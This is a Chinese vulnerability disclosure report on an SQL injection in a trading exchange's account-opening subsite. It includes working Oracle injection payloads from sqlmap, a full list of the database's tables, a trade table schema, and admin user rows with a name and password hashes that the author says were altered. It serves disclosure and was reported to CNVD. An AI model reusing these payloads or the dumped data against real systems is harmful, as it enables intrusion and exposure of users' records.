2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
中国艺交所邮币卡交易信中心的子站存在注入,可以查看交易记录等信息
注入点:http://**.**.**.**:16929/SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45数据的表300多个
Parameter: areaId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: funcflg=getBrokerList&areaId=45 AND 7878=7878 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: funcflg=getBrokerList&areaId=45 AND 1086=CTXSYS.DRITHSX.SN(1086,(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1086=1086) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113))) Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: funcflg=getBrokerList&areaId=45 AND 1951=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: funcflg=getBrokerList&areaId=45 UNION ALL SELECT NULL,NULL,CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(81)||CHR(98)||CHR(106)||CHR(83)||CHR(99)||CHR(109)||CHR(116)||CHR(90)||CHR(67)||CHR(81)||CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- ---back-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'TRADE_GNNT'sqlmap resumed the following injection point(s) from stored session:---Parameter: areaId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: funcflg=getBrokerList&areaId=45 AND 7878=7878 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: funcflg=getBrokerList&areaId=45 AND 1086=CTXSYS.DRITHSX.SN(1086,(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1086=1086) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113))) Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: funcflg=getBrokerList&areaId=45 AND 1951=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: funcflg=getBrokerList&areaId=45 UNION ALL SELECT NULL,NULL,CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(81)||CHR(98)||CHR(106)||CHR(83)||CHR(99)||CHR(109)||CHR(116)||CHR(90)||CHR(67)||CHR(81)||CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- ---back-end DBMS: OracleDatabase: TRADE_GNNT[314 tables]+------------------------------+| A_TEM_I_ORDERFEE || BI_DISMANTLE || BI_FINANCINGSTOCK || BI_FIRM || BI_FROZENSTOCK || BI_GOODSPROPERTY || BI_OUTSTOCK || BI_PLEDGESTOCK || BI_STOCK || BI_STOCKCHGLOG || BI_STOCKOPERATION || BI_SYSTEMPROPS || BI_TRADESTOCK || BI_WAREHOUSE || BR_BROKER || BR_BROKERAGE || BR_BROKERAGEANDFIRM || BR_BROKERAREA || BR_BROKERMENU || BR_BROKERREWARD || BR_BROKERREWARDPROPS || BR_BROKERRIGHT || BR_BROKERTYPE || BR_FIRMANDBROKER || BR_FIRMAPPLY || BR_REWARDPARAMETERPROPS || BR_TRADEMODULE || C_APPLY || C_AUDIT || C_DEPLOY_CONFIG || C_FRONT_MYMENU || C_FRONT_RIGHT || C_FRONT_ROLE || C_FRONT_ROLE_RIGHT || C_FRONT_SHORTCUTMENU || C_FRONT_USER_RIGHT || C_FRONT_USER_ROLE || C_GLOBALLOG_ALL || C_GLOBALLOG_ALL_H || C_LOGCATALOG || C_MARKETINFO || C_MYMENU || C_RIGHT || C_ROLE || C_ROLE_RIGHT || C_SUBMODULE || C_TRADEMODULE || C_USER || C_USER_RIGHT || C_USER_ROLE || F_ACCOUNT || F_ACCOUNTBOOK || F_BANKCLEARLEDGERCONFIG || F_B_ABCINFO || F_B_ACCOUNT || F_B_BANKACCOUNT || F_B_BANKCAPITALRESULT || F_B_BANKCOMPAREINFO || F_B_BANKQSDATE || F_B_BANKS || F_B_BANKTRANSFER || F_B_BATCUSTFILE || F_B_CAPITALINFO || F_B_DICTIONARY || F_B_FCS_10 || F_B_FCS_11 || F_B_FCS_13 || F_B_FCS_99 || F_B_FEEINFO || F_B_FFHD || F_B_FIRMBALANCE || F_B_FIRMBALANCEERROR || F_B_FIRMIDANDACCOUNT || F_B_FIRMKXH || F_B_FIRMTRADESTATUS || F_B_FIRMUSER || F_B_HXQS || F_B_INTERFACELOG || F_B_LOG || F_B_MAKETMONEY || F_B_MARGINS || F_B_MARKETACOUNT || F_B_PROPERBALANCE || F_B_QSRESULT || F_B_QUANYI || F_B_QUEUEINFO || F_B_RGSTCAPITALVALUE || F_B_TRADEDATA || F_B_TRADEDETAILACC || F_B_TRADELIST || F_B_TRANSFER || F_B_TRANSMONEYOBJ || F_B_ZFPH || F_CLEARSTATUS || F_CLIENTLEDGER || F_DAILYBALANCE || F_FIRMBALANCE || F_FIRMCLEARFUNDS || F_FIRMFUNDS || F_FIRMFUNDS_150619 || F_FIRMRIGHTSCOMPUTEFUNDS || F_FROZENFUNDFLOW || F_FROZENFUNDS || F_FUNDFLOW || F_FUNDFLOW_150619 || F_H_FROZENFUNDFLOW || F_H_FUNDFLOW || F_LEDGERFIELD || F_LOG || F_SUMMARY || F_SYSTEMSTATUS || F_VOUCHER || F_VOUCHERENTRY || F_VOUCHERMODEL || K_A_BREED || K_A_BREEDTRADEPROP || K_A_CMDTYSORT || K_A_COMMODITYSETTLEPROP || K_A_COMMODITYTRADEPROP || K_A_DAYSECTION || K_A_DELAYTRADETIME || K_A_FIRMBILLCOST || K_A_FIRMBREEDFEE || K_A_FIRMBREEDMARGIN || K_A_FIRMBREEDMAXHOLDQTY || K_A_FIRMFEE || K_A_FIRMMARGIN || K_A_FIRMMAXHOLDQTY || K_A_HOTCOMMODITY || K_A_ISSUECMINFO || K_A_ISSUECMINFOSORT || K_A_MARKET || K_A_NOTTRADEDAY || K_A_SETTLEPRIVILEGE || K_A_TRADEPRIVILEGE || K_A_TRADETIME || K_A_VERSIONINFO || K_BALANCESTATUS || K_BANKBACKRATE || K_BLOCKRELATION || K_BLOCKTRADE || K_BROADCAST || K_BR_FIRMREWARDDEAIL || K_CLEARSTATUS || K_COMMODITY || K_COMMODITY_DESCRIBE || K_CONSIGNER || K_CURMINNO || K_CUSTOMER || K_CUSTOMERHOLDSUM || K_DBLOG || K_DELAYORDERS || K_DELAYQUOTATION || K_DELAYSTATUS || K_DELAYTRADE || K_E_APPLYAHEADSETTLE || K_E_APPLYBILL || K_E_APPLYBILLLOG || K_E_APPLYGAGE || K_E_DEDUCTDETAIL || K_E_DEDUCTKEEP || K_E_DEDUCTPOSITION || K_E_DIRECTFIRMBREED || K_E_EMBEDORDERS || K_E_GAGEBILL || K_E_PLEDGE || K_E_SETTING || K_E_SETTLELOG || K_FIRM || K_FIRMFEE || K_FIRMHOLDSUM || K_FIRMPICTURE || K_FIRMTRANSFER || K_FIRM_150619 || K_FREEZEDETAILS || K_FREEZESUM || K_HOLDPOSITION || K_HOLDTRANSFER || K_HOLDTRANSFERFREEZEN || K_H_A_FIRMBILLCOST || K_H_BROADCAST || K_H_COMMODITY || K_H_CUSTOMERHOLDSUM || K_H_DELAYORDERS || K_H_DELAYQUOTATION || K_H_DELAYTRADE || K_H_DIRECTFIRMBREED || K_H_FIRM || K_H_FIRMFEE || K_H_FIRMHOLDSUM || K_H_FIRMMARGIN || K_H_HOLDPOSITION || K_H_I_ISSUEFEESUM || K_H_I_ORDERS || K_H_I_TRADE || K_H_LUCKYNUMBER || K_H_MARKET || K_H_ORDERS || K_H_ORIENTATIONASSIGNUPLOAD || K_H_QUOTATION || K_H_SELLFUNDS || K_H_TRADE || K_H_T_TRUSTEESHIPAPPLY || K_H_T_TRUSTFEE || K_INDEX || K_INDEXCOMMODITY || K_I_ALLOTMENTCONFIG || K_I_FIRMALLOTMENT || K_I_ISSUEFEESUM || K_I_ORDERS || K_I_ORDERS_150619 || K_I_TRADE || K_LUCKYNUMBER || K_MARKETFIRM || K_MARKETFIRMFUNDS || K_MARKETFIRMFUNDSSUM || K_NOTSENDBROADCAST || K_ORDERS || K_ORDERS_1 || K_ORIENTATIONASSIGNUPLOAD || K_QUOTATION || K_REDUCESET || K_REISSUEASSIGN || K_REISSUECOMMODITY || K_REISSUEFAILBACKPAYOUT || K_REISSUEREDUCE || K_REISSUEUNDERWRITER || K_REISSUEVENDORBACKBROKER || K_REISSUEVENDORPAYOUT || K_SELLFUNDS || K_SETTLECOMMODITY || K_SETTLEFIRMHOLDSUM || K_SETTLEHOLDPOSITION || K_SETTLEMATCH || K_SETTLEPROPS || K_SETTLEUNDERWRITERSUBSCRIBE || K_SHARESAUTOFREE || K_SHARESNOTE || K_SPECFROZENHOLD || K_SPLITSET || K_SYSLOG || K_SYSLOG_150619 || K_SYSTEMSTATUS || K_TRADE || K_TRADER || K_TRANSFERORDER || K_T_COMMODITYADVICE || K_T_TRUSTDATE || K_T_TRUSTEESHIPAPPLY || K_T_TRUSTFEE || K_T_TRUSTLOGS || K_T_TRUSTTURNHISTABLE || K_T_TRUSTWAREHOUSE || K_UNDERWRITERSUBSCRIBE || K_VALIDBILL || K_VALIDGAGEBILL || K_VENDORBACKBROKER || K_VENDORPAYOUT || L_AUCONFIG || L_DICTIONARY || L_MODULEANDAU || M_AGENTTRADER || M_BREED || M_BREEDPROPS || M_CATEGORY || M_CERTIFICATETYPE || M_ERRORLOGINLOG || M_FIRM || M_FIRMCATEGORY || M_FIRMMODULE || M_FIRM_1 || M_FIRM_APPLY || M_INDUSTRY || M_MESSAGE || M_NOTICE || M_PROCEDURES_ERRORCODE || M_PROPERTY || M_PROPERTYTYPE || M_SYSTEMPROPS || M_TRADER || M_TRADERMODULE || M_TRADER_1 || M_ZONE || TZ_TEST || W_ERRORLOGINLOG || W_GLOBALLOG_ALL || W_GLOBALLOG_ALL_H || W_K_BILL || W_K_BILLFROZENHOLDPOSITION || W_K_BILLLABELLED || W_K_BILLLOG || W_K_COMMODITYANDSTOCK || W_K_COMMODITYAVGPRICE || W_K_DELIVERYONLINE || W_K_DELIVERYPASSWORDLOG || W_K_INWAREHOUSE || W_K_INWAREHOUSEANDSTOCK || W_K_MARKETOPERATE || W_K_MENU || W_K_OUTWAREHOUSE || W_K_USERS || W_K_WAREHOUSE || W_K_WAREHOUSEANDBREED || W_K_WAREHOUSELABELLED || W_K_WAREHOUSESUM || W_LOGCATALOG || W_MYMENU || W_RIGHT || W_ROLE || W_ROLE_RIGHT || W_TRADEMODULE || W_USER || W_USER_RIGHT || W_USER_ROLE |+------------------------------+
交易表:
Table: K_TRADE[21 columns]+------------------+----------+| Column | Type |+------------------+----------+| A_ORDERNO | NUMBER || A_TRADENO | NUMBER || A_TRADENO_CLOSED | NUMBER || ATCLEARDATE | DATE || BS_FLAG | NUMBER || CLOSE_PL | NUMBER || CLOSEADDEDTAX | NUMBER || COMMODITYID | VARCHAR2 || CUSTOMERID | VARCHAR2 || FIRMID | VARCHAR2 || HOLDPRICE | NUMBER || HOLDTIME | DATE || M_TRADENO | NUMBER || M_TRADENO_OPP | NUMBER || ORDERTYPE | NUMBER || PRICE | NUMBER || QUANTITY | NUMBER || TRADEATCLEARDATE | DATE || TRADEFEE | NUMBER || TRADETIME | DATE || TRADETYPE | NUMBER |+------------------+----------+
公司用户的信息表:Database: TRADE_GNNTTable: C_USER[62 entries]+-------+----------+--------+---------+---------------------+-----------------+----------------------------------+-------------+| ID | ISFORBID | NAME | SKIN | TYPE | KEYCODE | PASSWORD | DESCRIPTION |+-------+----------+--------+---------+---------------------+-----------------+----------------------------------+-------------+| admin | N | admin | default | DEFAULT_SUPER_ADMIN | 0123456789ABCDE | 011f8fc7dd7db9d6d4a42888d5c4874c | 超级管理员 || 2014 | N | 何海燕 | default | ADMIN | 0123456789ABCDE | 3962efc16ce9cb118836a8889b93fd01 | NULL || 2027 | Y | 客服临时17 | default | ADMIN | 0123456789ABCDE | 161606fd049c6b2c6dcc3888af629507 | NULL || 2028 | Y | 客服临时18 | default | ADMIN | 0123456789ABCDE | 07350745e604aff8971888870421e1c2 | NULL || 2029 | Y | 客服临时19 | default | ADMIN | 0123456789ABCDE | a50aa17bae62f7c84dec888e6b870ab1 | NULL || 2030 | Y | 客服临时20 | default | ADMIN | 0123456789ABCDE | 1bd084e9306c8d1dda3888de9be18c44 | NULL |以上的信息只是为了证明漏洞的存在,所以贴出来的md5是进行改动的。
危害等级:高
漏洞Rank:11
确认时间:2015-11-20 15:01
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无
